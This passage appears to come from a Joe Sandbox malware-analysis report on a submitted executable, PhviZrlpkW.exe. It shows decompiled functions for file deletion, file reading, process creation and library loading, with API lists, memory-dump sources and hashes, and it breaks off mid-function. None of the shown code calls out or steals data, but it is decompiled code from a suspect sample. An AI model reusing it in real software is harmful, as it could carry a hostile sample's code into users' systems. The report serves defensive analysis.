                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 41%
                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                    0x00405d2d
                    0x00405d38
                    0x00405d3d
                    0x00405d6d
                    0x00000000
                    0x00405d6d
                    0x00405d44
                    0x00405d45
                    0x00405d4f
                    0x00405d47
                    0x00405d47
                    0x00405d47
                    0x00405d57
                    0x00405d63
                    0x00405d67
                    0x00405d67
                    0x00000000
                    0x00405d59
                    0x00000000
                    0x00405d5b

                    APIs
                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$Attributes$DeleteDirectoryRemove
                    • String ID:
                    • API String ID: 1655745494-0
                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                    0x00406af1
                    0x00406b08
                    0x00406afc
                    0x00406b06
                    0x00406b06
                    0x00406b13
                    0x00406b1f

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                    • GetExitCodeProcess.KERNELBASE ref: 00406B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CodeExitProcess
                    • String ID:
                    • API String ID: 2567322000-0
                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                    0x00403375
                    0x0040337e
                    0x00403387
                    0x0040338b
                    0x00403396
                    0x00403396
                    0x0040339e
                    0x004033a5
                    0x004033b7
                    0x004033be
                    0x00403463
                    0x00403463
                    0x00000000
                    0x004033c4
                    0x004033c7
                    0x004033d3
                    0x004033d7
                    0x00403471
                    0x00403471
                    0x004033dd
                    0x004033e0
                    0x0040343f
                    0x00403445
                    0x00403447
                    0x00403447
                    0x00403459
                    0x00403461
                    0x00403468
                    0x0040346b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004033e2
                    0x004033e5
                    0x00000000
                    0x004033eb
                    0x004033f0
                    0x004033f7
                    0x004033fa
                    0x004033fc
                    0x004033fc
                    0x00403409
                    0x0040340c
                    0x00403413
                    0x00000000
                    0x00000000
                    0x0040341c
                    0x00403423
                    0x0040343b
                    0x00403465
                    0x00403465
                    0x00403425
                    0x00403425
                    0x00403428
                    0x0040342b
                    0x00403431
                    0x00403437
                    0x00000000
                    0x00403439
                    0x00000000
                    0x00403439
                    0x00403437
                    0x00000000
                    0x00403423
                    0x00000000
                    0x004033f0
                    0x004033e5
                    0x004033e0
                    0x004033d7
                    0x004033be
                    0x00403473
                    0x00403476

                    APIs
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                    0x004015c1
                    0x004015c9
                    0x004015cc
                    0x004015d1
                    0x004015d5
                    0x004015d7
                    0x004015df
                    0x004015e1
                    0x004015e4
                    0x004015ea
                    0x00401604
                    0x00401607
                    0x004015ec
                    0x004015ec
                    0x004015ef
                    0x00000000
                    0x004015fa
                    0x004015fd
                    0x004015fd
                    0x004015ef
                    0x0040160e
                    0x00401615
                    0x00401624
                    0x00401624
                    0x00401617
                    0x0040161a
                    0x00401622
                    0x00000000
                    0x00000000
                    0x00401622
                    0x00401615
                    0x00401627
                    0x0040162b
                    0x0040162c
                    0x004015d7
                    0x00401634
                    0x00401663
                    0x004022f1
                    0x00401636
                    0x00401638
                    0x00401645
                    0x0040164d
                    0x00401655
                    0x0040165b
                    0x0040165b
                    0x00401655
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                    • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                    0x0040138a
                    0x004013fa
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                    0x00405c54
                    0x00405c74
                    0x00405c7c
                    0x00405c81
                    0x00000000
                    0x00405c87
                    0x00405c8b

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-0
                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                    0x00406a3d
                    0x00406a40
                    0x00406a47
                    0x00406a4f
                    0x00406a5b
                    0x00000000
                    0x00406a62
                    0x00406a52
                    0x00406a59
                    0x00000000
                    0x00406a6a
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                    0x0040615c
                    0x00406169
                    0x0040617e
                    0x00406184

                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\PhviZrlpkW.exe,80000000,00000003), ref: 0040615C
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406133(WCHAR* _a4) {
